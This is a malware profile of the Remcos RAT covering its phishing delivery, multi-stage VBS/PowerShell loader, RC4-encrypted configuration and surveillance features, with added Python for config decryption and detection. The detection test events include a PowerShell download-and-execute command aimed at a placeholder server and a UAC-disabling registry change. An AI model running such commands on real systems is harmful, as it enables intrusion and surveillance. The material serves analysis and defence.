Name | Remcos |
Type of Malware | RAT |
Date of Initial Activity | 2016 |
Associated Groups | Gorgon Group, LazyScripter |
Motivation | Keylogging and surveillance (audio capture, screenshots) to steal account credentials, sensitive information and cryptocurrency; staging of follow-on infections |
Attack Vectors | Phishing emails; malicious email attachments (PDFs and Office documents) |
Targeted System | Windows |
Overview
Remcos is a RAT first observed in the wild in 2016. It is distributed mainly through malicious Microsoft Office documents attached to spam emails, and it is designed to bypass Microsoft Windows User Account Control (UAC) so that the malware runs with elevated privileges.
Remcos is in fact a legitimate tool sold by the German company Breaking Security under the name Remote Control and Surveillance, and it is commonly abused by threat actors.
Targets
Targets Regular Users.
Tools/ Techniques Used
After infecting a computer, Remcos gives the attacker backdoor access to the system and collects a variety of sensitive information. It is commonly delivered by phishing: the malware may be embedded in a malicious ZIP file masquerading as a PDF that claims to contain an invoice or order, or it may arrive in a Microsoft Office document whose malicious macros unpack and deploy the payload.
To evade detection, Remcos uses process injection or process hollowing so that it runs inside a legitimate process. It also installs persistence mechanisms and runs in the background to stay hidden from the user. As a RAT, command and control (C2) is a core capability: traffic to the C2 server is encrypted, and operators use dynamic DNS to generate a variety of C2 domains, which defeats protections that rely on filtering traffic to known malicious domains.
In one analyzed campaign, the lure was a password-protected Excel document; the password was supplied in the email itself. Because the file contains macro code, Excel displays the yellow security warning bar, and the document's text lures the victim into clicking Enable Content, which dismisses the warning and runs the malicious macro.
The macro defines a Workbook_Activate() event handler that runs automatically when the workbook is opened. It extracts VBS code from worksheet cells into the file "%AppData%\HobYQ.vbs" and executes it. The Remcos payload is then fetched through a deliberately convoluted, multi-stage chain that mixes VBS and PowerShell: "HobYQ.vbs" runs a segment of dynamically spliced PowerShell code that downloads a second VBS file ("flip.vbs") from the attacker's server and runs it. "flip.vbs" then downloads "mem.txt", a piece of encoded VBS code that it decodes and executes later, and that code downloads the final payload, "faze.jpg", from the same server.
Every Remcos build carries an RC4-encrypted configuration block in a PE resource named "SETTINGS" (Figure 8). The first byte (0xB1 in this sample) is the length of the RC4 key that immediately follows it; the remaining bytes are the encrypted configuration block.
The first thing Remcos does is decrypt this block, which it consults throughout its lifetime. It contains, among other things: the C2 server information; the name the attacker assigned to recognize the victim; the Remcos sub-key name in the registry; the name of the log file that records the victim's keystrokes and clipboard data; a set of flags that tell Remcos which features to start on the victim's device; and the authentication data used to establish the connection to the C2 server.
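As an added example (not code from the page's source or from Remcos itself), the following Python parses a blob laid out as just described: one key-length byte, the RC4 key, then the RC4-encrypted configuration. The sample blob is constructed inside the script rather than taken from a real resource; the `|\x1e\x1e\x1f|` field separator and the field order are assumptions to be checked against the sample under analysis. Extracting the raw `SETTINGS` resource bytes from the PE (for example with pefile) is left outside the block, which works on the bytes only.

```python
from typing import List

# Assumed field separator: recent Remcos builds are reported to delimit configuration
# fields with these bytes. Treat it as an assumption and adjust for your sample.
FIELD_SEP = b"|\x1e\x1e\x1f|"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). The same call both encrypts and decrypts."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def split_settings(blob: bytes):
    """SETTINGS layout: [key_len:1][rc4_key:key_len][ciphertext...]. Rejects truncated input."""
    if len(blob) < 2:
        raise ValueError("SETTINGS resource too short")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len + 1:
        raise ValueError("key length byte does not fit the resource size")
    return blob[1:1 + key_len], blob[1 + key_len:]


def decrypt_settings(blob: bytes) -> bytes:
    """Returns the plaintext configuration block."""
    key, ciphertext = split_settings(blob)
    return rc4(key, ciphertext)


def parse_fields(plaintext: bytes) -> List[str]:
    """Splits the decrypted block into its delimited fields."""
    return [f.decode("latin-1") for f in plaintext.split(FIELD_SEP)]


def build_settings(key: bytes, fields: List[str]) -> bytes:
    """Builds a SETTINGS-shaped blob; used only to construct test input, not a real sample."""
    if not 1 <= len(key) <= 255:
        raise ValueError("key length must fit in one byte")
    plaintext = FIELD_SEP.join(f.encode("latin-1") for f in fields)
    return bytes([len(key)]) + key + rc4(key, plaintext)


# Constructed sample. Field order and values are illustrative, loosely following the
# categories the text lists (C2, victim tag, registry sub-key, log file, flags, auth data).
SAMPLE_KEY = b"constructed-demo-key-not-from-a-real-sample"
SAMPLE_FIELDS = [
    "203.0.113.10:2404:1",       # C2 host:port:flag (illustrative)
    "RemoteHost",                # name the operator assigned to recognize the victim
    "hypothetical_subkey",       # registry sub-key name (hypothetical)
    "logs.dat",                  # keylogger/clipboard log file name
    "1", "0", "1",               # feature flags (illustrative)
    "constructed-auth-token",    # C2 authentication data
]
SAMPLE_SETTINGS = build_settings(SAMPLE_KEY, SAMPLE_FIELDS)

if __name__ == "__main__":
    key, _ = split_settings(SAMPLE_SETTINGS)
    print(f"key length byte: 0x{SAMPLE_SETTINGS[0]:02x} ({len(key)} bytes)")
    for idx, field in enumerate(parse_fields(decrypt_settings(SAMPLE_SETTINGS))):
        print(f"[{idx}] {field}")
```

Because RC4 is a keystream XOR, the same `rc4()` routine decrypts a real resource and encrypts the constructed one; the length check in `split_settings()` is what stops a corrupt or truncated resource from silently yielding garbage.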
The Remcos workflow is straightforward: it starts several threads that perform auto-start tasks according to the flags defined in the configuration block, including:
- adding Remcos to the auto-run group in the system registry;
- starting a watchdog program (Remcos' daemon process);
- recording the victim's audio input from an input device (microphone);
- capturing screenshots of the victim's desktop at startup;
- disabling UAC (User Account Control) on the victim's device.
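Added example, not code from the page's source: Python detection logic run over a handful of constructed Sysmon-style process-creation and registry events. It flags the delivery chain described earlier (an Office application launching a script host on a file under %AppData%, then that script host launching a PowerShell downloader) together with two of the auto-start actions listed above (a Run-key value pointing into a user-writable directory, and EnableLUA set to 0). The events, paths and the registry sub-key name are constructed for illustration; the rule names are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events (process creation and registry value set).
# Illustrative records written for this example, not logs from a real incident.
EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"EXCEL.EXE" "C:\Users\victim\Downloads\invoice.xlsm"'},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\victim\AppData\Roaming\HobYQ.vbs"'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/flip.vbs')\""},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\hypothetical_subkey",
     "data": r"C:\Users\victim\AppData\Roaming\hypothetical_subkey\remcos.exe"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "data": "DWORD (0x00000000)"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell Get-Process"},  # benign
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
USER_WRITABLE_RE = re.compile(r"\\(appdata|temp|programdata|users\\public)\\", re.I)
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
ENABLE_LUA_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system\enablelua"


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def dword_is_zero(data: str) -> bool:
    """Accepts '0', '0x0' and Sysmon's 'DWORD (0x00000000)' spellings."""
    m = re.search(r"(0x[0-9a-f]+|[0-9]+)\)?\s*$", data.strip().lower())
    if not m:
        return False
    token = m.group(1)
    return int(token, 16 if token.startswith("0x") else 10) == 0


def check_process(ev: Dict[str, str]) -> List[str]:
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    cmdline = ev.get("cmdline", "")
    hits = []
    # Stage 1: an Office application launches a script host on a file in a user-writable directory.
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS and USER_WRITABLE_RE.search(cmdline):
        hits.append("office_spawns_script_host_from_user_dir")
    # Stage 2: the script host launches PowerShell that downloads further content.
    if parent in SCRIPT_HOSTS and image in POWERSHELL and DOWNLOAD_RE.search(cmdline):
        hits.append("script_host_spawns_powershell_downloader")
    return hits


def check_registry(ev: Dict[str, str]) -> List[str]:
    key, data = ev["key"].lower(), ev.get("data", "")
    hits = []
    # UAC disabled by zeroing EnableLUA.
    if key == ENABLE_LUA_KEY and dword_is_zero(data):
        hits.append("uac_disabled_via_enablelua")
    # Run-key persistence whose target lives in a user-writable directory.
    if RUN_KEY_RE.search(key) and USER_WRITABLE_RE.search(data):
        hits.append("run_key_persistence_in_user_dir")
    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Returns (event index, rule name) for every rule that fires."""
    findings = []
    for idx, ev in enumerate(events):
        checker = check_process if ev["type"] == "process" else check_registry
        for rule in checker(ev):
            findings.append((idx, rule))
    return findings


if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(f"event {idx}: {rule}")
```

The parent/child pairing is what carries the signal here: `wscript.exe` or `powershell.exe` on their own are common on a workstation, but an Office parent for the script host and a script-host parent for a downloading PowerShell are rare in legitimate use, and the two registry rules catch the persistence and UAC changes independently of how the payload arrived.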
Remcos Malware Capabilities
Some of the key capabilities of the malware include:
- Privilege Elevation: Remcos can gain Administrator permissions on an infected system and disable User Account Control (UAC). This makes it easier for the attacker to execute malicious functionality.
- Defense Evasion: Remcos uses process injection to embed itself within legitimate processes, making it more difficult for antivirus to detect. Additionally, the malware can run in the background to hide itself from users.
- Data Collection: One of the core capabilities of the Remcos malware is to collect information about the user of a computer. It can log keystrokes, capture screenshots, audio, and clipboard contents, and collect passwords from the infected system.
Impact / Significant Attacks
Operation Spalax.